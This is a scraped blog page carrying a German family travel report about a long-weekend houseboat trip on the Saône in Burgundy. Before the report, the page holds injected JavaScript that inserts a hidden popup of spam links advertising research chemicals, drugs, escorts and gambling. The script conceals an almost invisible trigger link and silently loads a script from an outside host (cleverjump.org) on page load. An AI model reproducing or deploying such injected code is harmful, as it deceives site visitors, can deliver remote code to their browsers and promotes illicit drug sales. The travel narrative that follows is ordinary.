(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
drugs to treat adhd<\/a> <\/div>
www.loyal-pharmacist.com<\/span> <\/div> <\/div>
\u043a\u043e\u043b\u044f\u0441\u043a\u0438 abc astro<\/a> <\/div>
mamastore.com.ua<\/span> <\/div> <\/div> <\/div>
uk linux vps hosting<\/a> <\/div>
www.ihostvps.net<\/span> <\/div> <\/div>
oq \u00e9 anatomic gel<\/a> <\/div>
www.gone.com.br<\/span> <\/div> <\/div> <\/div>
conferences event management<\/a> <\/div>
www.conferences.co.za<\/span> <\/div> <\/div>
buy psychedelic research chemicals online<\/a> <\/div>
medsengages.com<\/span> <\/div> <\/div> <\/div>
akun togel terpercaya<\/a> <\/div>
okewin.online<\/span> <\/div> <\/div>
s\u1ed1 \u0111u\u00f4i \u0111i\u1ec7n tho\u1ea1i t\u1ed1t<\/a> <\/div>
simsodep.com<\/span> <\/div> <\/div> <\/div>
\u043f\u0440\u043e\u0434\u0430\u0436\u0430 \u043a\u0440\u0435\u0434\u0438\u0442\u043d\u044b\u0445 \u0430\u0432\u0442\u043e<\/a> <\/div>
autovubor.com.ua<\/span> <\/div> <\/div>
buy research chemicals online usa pellets<\/a> <\/div>
www.klasiekpharmacy.com<\/span> <\/div> <\/div> <\/div>
\u0438\u043d\u0442\u0435\u0440\u0435\u0442 \u043c\u0430\u0433\u0430\u0437\u0438\u043d \u0432\u0441\u0435 \u0434\u043b\u044f \u043e\u0433\u043e\u0440\u043e\u0434\u0430<\/a> <\/div>
ogorod-legko.com.ua<\/span> <\/div> <\/div>
avc\u0131lar escort bayan<\/a> <\/div>
www.burayabirbak.com<\/span> <\/div> <\/div> <\/div>
\u043b\u0430\u0437\u0435\u0440\u043d\u044b\u0439 \u043d\u0438\u0432\u0435\u043b\u0438\u0440 skil \u043b\u0430\u0437\u0435\u0440\u043d\u044b\u0439 \u043d\u0438\u0432\u0435\u043b\u0438\u0440<\/a> <\/div>
vinkel.com.ua<\/span> <\/div> <\/div>
\u0442\u0440\u044e\u0444\u0435\u043b\u044c \u043a\u0443\u043f\u0438\u0442\u044c \u0443\u043a\u0440\u0430\u0438\u043d\u0430<\/a> <\/div>
alemax.com.ua<\/span> <\/div> <\/div> <\/div>
\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043c\u0430\u0433\u0430\u0437\u0438\u043d \u0438\u0433\u0440 \u0434\u043b\u044f psp<\/a> <\/div>
gameniks.kiev.ua<\/span> <\/div> <\/div>
my floral shop<\/a> <\/div>
www.flowers24hours.com.au<\/span> <\/div> <\/div> <\/div>
lucci lighting australia<\/a> <\/div>
www.mpcshop.it<\/span> <\/div> <\/div>
endurablend ten sar erosion<\/a> <\/div>
pavementsurfacecoatings.com<\/span> <\/div> <\/div> <\/div>
cabo villa beachfront<\/a> <\/div>
www.karlacasillas.com<\/span> <\/div> <\/div>
alvorlig sykdom forsikringsselskap<\/a> <\/div>
www.financiering.no<\/span> <\/div> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div>
\u0437\u0430\u043a\u0430\u0437\u0430\u0442\u044c \u043f\u0438\u0432\u0430 \u043e\u043d\u043b\u0430\u0439\u043d<\/a> <\/div>
pivasik.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();
15.08.2012

Reisebericht Burgund/Saone Wochenende

Botsfahrt vom 07.06.-10.06.2012 auf der Saone

Boot: Magnifique
Übernahme- und Rückgabehafen: St. Jean de Losne
Crew: 4 Erwachsene und 4 Kinder: Joel 4 Jahre, Silas 6 Jahre, Justin 7 Jahre und Janine „Jaqueline“ 9 Jahre

Am Donnerstag kamen wir mir unseren beiden Autos gegen 14:00 Uhr an der Basis in St. Jean de Losne an. Draußen waren ca. 33 Grad, es war mittlerweile stark windig und am Horizont zeigte sich bereits eine sehr sehr dunkle Wand.

Wir begaben uns in das Büro und wurden deutschsprachig begrüßt. Die unterlagen wurden schnell zur Verfügung gestellt und jeder der Kids erhielt seine Schwimmweste entsprechend seines Gewichtes. Für Janine und Silas etwas neues, denn Sie sind bis zu diesem Zeitpunkt noch nie Hausboot gefahren.

Nach dem Hafenbüro wurde das Gepäck aus den Autos in`s Boot verfrachtet……..wollten wir drei Wochen an Bord bleiben……. Soooooooooooooooo viele Koffer und Taschen!!!???
Tipp: Packen Sie die Koffer und Verpflegungskisten aus und lassen Sie sie im Auto.

Ich habe dann noch von der in der Nähe befindlichen Boulangerie frische Baguettes und Croissants geholt und als ich zurück kam war auch bereits der Techniker für die Einweisung da. Da wir bereits mit der Magnifique gefahren sind, ging die Einweisung zügig von statten und gegen 16:30 Uhr konnten wir bereits ablegen.

Nachwievor war es windig und die dunkle Wolkenwand war auch bereits sehr nah bei uns, aber wir wollten ja Boot fahren und beim Boot fahren gibt es ja kein schlechtes Wetter, sondern nur schlechte Kleidung ;-) . Also legten wir ab und fuhren auf der recht breiten Saone in Richtung Norden. Ziel und um die Kinder zu erfreuen war es, mindestens eine Schleusung zu machen. Von St. Jean Richtung Gray kam die erste Schleuse erst nach 15 km. Und was passierte als wir dort ankamen? Richtig, es fing kurz vor Schleusenöffnung richtig an zu regnen. Da es aber sehr warm war und der Wind nachgelassen hatte, war der Regen sogar recht angenehm. Es kühlte sich auch etwas ab und die Luft wurde merklich klarer und frischer. Jedenfalls hatten die Kinder ihren Spaß beim Schleusen im Regen und waren für den ersten Tag überglücklich.

Wir machten dann hinter der Schleuse im Ort Auxonne fest. Dort gibt es auf der rechten Seite einen Stadtanleger und dahinter einen neuen Hafen im Hafenbecken. Wir fanden noch einen Platz am Stadtanleger.

Damit die Kinder noch ein wenig Bettschwere bekommen entschlossen wir uns zu einem kleinen Stadtrundgang. Auxonne ist diesbezüglich nicht der Brüller. Empfehlenswert, wie überall in Frankreich, die Kirche. Die Reste der Stadtmauer waren sehr sehenswert. Hier war übrigens Napolen in einem Regiment und hat dort in der Armee das „laufen gelernt“.

Die Kinder waren nach dem Spaziergang wirklich sehr platt. Wir aßen dann gemütlich Abendbrot. Begeistert waren die Kids natürlich über den Fernseher im Salon und das man wie zu Hause alle Sender schauen konnte……… und dann noch beim Abendbrot ;-))))))))))))

Hinweis: Die Magnifique verfügt über eine selbstnachführende Satellitenanlage, also nur einschalten und die Schüssel unter der Haube justiert sich eigenständig und sucht den Astra 19.2 Satellit.
Weitere Vorteile der Magnifique:
Zwei Kühlschränke
Bugstrahlruder
Landstromanschluß

Am nächsten Tag, Freitag, ging es dann recht früh weiter in Richtung Gray, das Wetter war wieder sehr schön geworden. Da es morgens noch sehr frisch war, fuhr ich vom äußeren Steuerstand. Links und rechts der Saone waren Waldgebiete und es knallte ständig. Wie auf einem Schießplatz. Ca. 100 Meter vor unserem Boot an der rechten Uferseite sah ich mit einem mal zwei längliche Körper im Wasser Richtung Flussmitte schwimmen. Ich dachte zuerst an Biber, wurde aber eines besseren belehrt. Es waren zwei junge Wildschweine. Gehört hatte ich ja schon davon, dass Wildschweine schwimmen können, gesehen aber noch nicht. Alle nach oben geeilten Crewmitglieder staunten ebenfalls. Aber schaut selbst…. Es ist kein Seemannsgarn.

Wir machten eine Schleuse und kamen mittags in Pontaillier an. Unweit des Anlegekais fanden wir einen schönen Kinderspielplatz. Auch ein gutes Restaurant war dort neben dem Spielplatz, mit Biergarten und gehobener Küche.

Wir schlenderten durch den kleinen netten Ort, aßen ein Eis und fuhren nach unserem Mittag an Bord weiter. Mittlerweile war der Wunsch nach baden , aber nicht nur von Seiten der Kinder, immer lauter geworden. Also fuhren wir an`s Ufer und machten dort fest.

Die Badeleiter war schnell im Wasser und ein Fender wurde an einer Festmacherleine angebunden und als Strömungsleine für die Kids ausgeworfen (Es ist auf der Saone eine geringe Strömung vorhanden!). Unser Dreijährige planschte auf der Badeplattform sitzend mit den Füßen im Wasser. Die anderen Drei wollten unbedingt mit der Schwimmweste in`s Wasser. Trägt die einen überhaupt? – war das Argument…… was will man da noch sagen.
Es war für Alle eine Gaudi und hat die nötige Abkühlung gebracht. Eines war klar, mindestens einmal gehen wir noch baden. Die Schwimmwesten wurden zum trocknen an der Reling aufgehängt.

Langsam fuhren wir weiter, machten wiederum einige Schleusen und wollten eigentlich abends in freier Natur festmachen. Wir fanden keine geeignete Stelle und landeten im idyllischen Dörfchen Mantoche. Eine Kaimauer von ca.80 m bot Liegeplätze. Hinter der Kaimauer befindet sich ein herrlicher Rasensteifen (ca. 20 m breit)  mit darauf stehenden Trauerweiden und Holzbänke und –tische. Die Frauen gingen mit den Kids durch das Dorf und sahen einige prächtige Villen mit hohen Zäunen. Wir, die Männer, kümmerten uns um das Essen….. nachdem wir eine Flasche Wein geöffnet und ein Gläschen getrunken hatten.
Der mitgebrachte Grill wurde entfacht und bevor die Piraten vom Spaziergang zurück waren, waren die ersten Würstchen und Steaks fertig. Die Frauen zauberten noch schnell zwei Salate und mit frischem Baguette war das Abendbrot perfekt.

Nach dem Abendbrot tobten die Kinder noch einige Zeit rum, die Trauerweiden luden dazu ein und mit Wasser und Erde wurden einige Matschbällchen geformt…… auch die Füße waren danach etwas matschig, aber Wasser war ja genug da :).

Am Samstagmorgen fuhren wir nach Gray, machten vor der Schleuse am Kai fest und machten einen kleinen Stadtrundgang mit Spielplatz- und Marktbesuch.

Dann traten wir die Rückreise an. Es war wiederum sehr warm und so entschlossen wir uns erneut zum baden. Erneut eine willkommene Abkühlung.

Zum Abend wollten wir einen Platz außerhalb einer Ortschaft suchen, an dem man ein kleines Feuerchen machen und grillen kann. Die Männer wollten unbedingt das Europameisterschaftsspiel der Deutschen sehen. Es war nicht so einfach, da bei zwei schönen Stellen die Äste der Bäume tief und in Richtung des Satelliten hingen. Beim dritten Anlauf hatte es dann aber geklappt. Das Fernsehbild stand, die Jungs suchten sofort Holz zum Feuer machen, der Grill wurde wieder angeheizt. Damit die Kids wieder ordentlich Hunger bekommen, wurde noch ein kleiner Spaziergang gemacht.

Unser Kleiner, Joel, war mittlerweile auch so richtig aufgetaut und ging mal eben alleine auf Erkundungstour Richtung der Brücke in deren Nähe wir lagen. Janine war das nicht so Geheuer und folgte ihm. Die Kids waren mittlerweile ein gutes Team geworden. Nach gutem Essen, einer Flasche Wein, einem Lagerfeuer und ein (da noch) gewonnenem Spiel der Nationalmannschaft gingen wir zur letzten Nachtruhe unseres Bootstrips.

Am Sonntag machten wir dann noch unsere letzte Schleusung. Thomas hatte Lust ein wenig den in den letzten Tagen angefutterten Speck abzutrainieren und entschloß sich zu einer Joggingtour am Ufer entlang. Wir setzten ihn ab, gaben ihm einen kleinen Vorsprung und nahmen dann die Verfolgung auf. In Auxonne hatten wir ihn eingeholt und nahmen ihn wieder an Bord auf.

Gegen Mittag kamen wir wieder in St. Jean de Losne an und fuhren nach Bootsabgabe und einem kleinen Imbiß erholt nach Hause.

Kategorien